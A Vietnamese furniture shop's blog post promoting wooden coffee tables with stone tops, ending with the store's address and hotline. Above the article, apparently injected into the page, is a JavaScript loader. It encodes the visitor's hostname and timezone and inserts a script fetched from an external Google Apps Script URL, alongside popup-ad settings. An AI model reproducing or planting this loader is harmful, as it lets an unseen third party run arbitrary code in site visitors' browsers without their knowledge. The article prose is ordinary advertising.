var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Xu hướng chọn bàn gỗ mặt đá cho phòng khách hiện đại

Các mẫu bàn trà hiện nay rất đa dạng cho khách hàng lựa chọn. Trong đó, các mẫu bàn gỗ mặt đá được nhiều khách hàng yêu thích bởi nét đẹp sang trọng cùng độ bền đẹp lâu dài trong quá trình sử dụng. Cùng tìm hiểu về các mẫu bàn trà này qua bài viết dưới đây của Nội Thất Xinh nhé.

Bàn gỗ mặt đá cho không gian sang trọng

Các mẫu bàn trà sofa làm từ gỗ được nhiều khách hàng yêu thích bởi chúng mang đến không gian ấm áp nhưng không kém phần sang trọng. Bàn gỗ mặt đá kết hợp mặt đá sáng bóng ở phía trên càng giúp cho không gian trở nên nổi bật hơn bao giờ hết. Các bạn sẽ có không gian đẹp cùng với đó cực sang cho căn phòng của gia đình mình.

bàn gỗ mặt đá

Không gian cực sang với bàn gỗ mặt đá


Với mẫu bàn trà này bạn cũng sẽ dễ dàng kết hợp cùng các đồ nội thất khác để có được không gian đẹp và sang trọng nhất. Bạn có thể kết hợp cùng bất kỳ bộ bàn ghế sofa, tấm tham trang tri nào đều thích hợp. Chắc chắn đây sẽ là sự lựa chọn hoàn hảo nhất cho không gian sống của gia đình bạn.

Phù hợp với nhiều không gian

Mẫu bàn gỗ mặt đá này cũng có thể dễ dàng phù hợp cho nhiều không gian sống khác nhau. Đa số các mẫu ban tra sofa này đều được thiết kế theo phong cách hiện đại, không quá cầu kỳ các chi tiết. Do đó, bạn sẽ có thể dễ dàng đặt trong bất cứ không gian nào. Đây cũng là mẫu bàn trà xu hướng được nhiều khách hàng yêu thích hiện nay.

bàn gỗ mặt đá

Bàn trà đẹp cho nhiều không gian sống


Nội Thất Xinh hiện có rất nhiều mẫu bàn gỗ mặt đá cho khách hàng lựa chọn. Chúng tôi cam kết mang đến các sản phẩm chất lượng với giá thành tốt nhất. Đến ngay số 321 Trường Chinh – Thanh Xuân hoặc liên hệ hotline 0975.90.3333 để được tư vấn cụ thể nhé.

>>>Xem thêm: Bàn sofa đôi mới lạ cho không gian hiện đại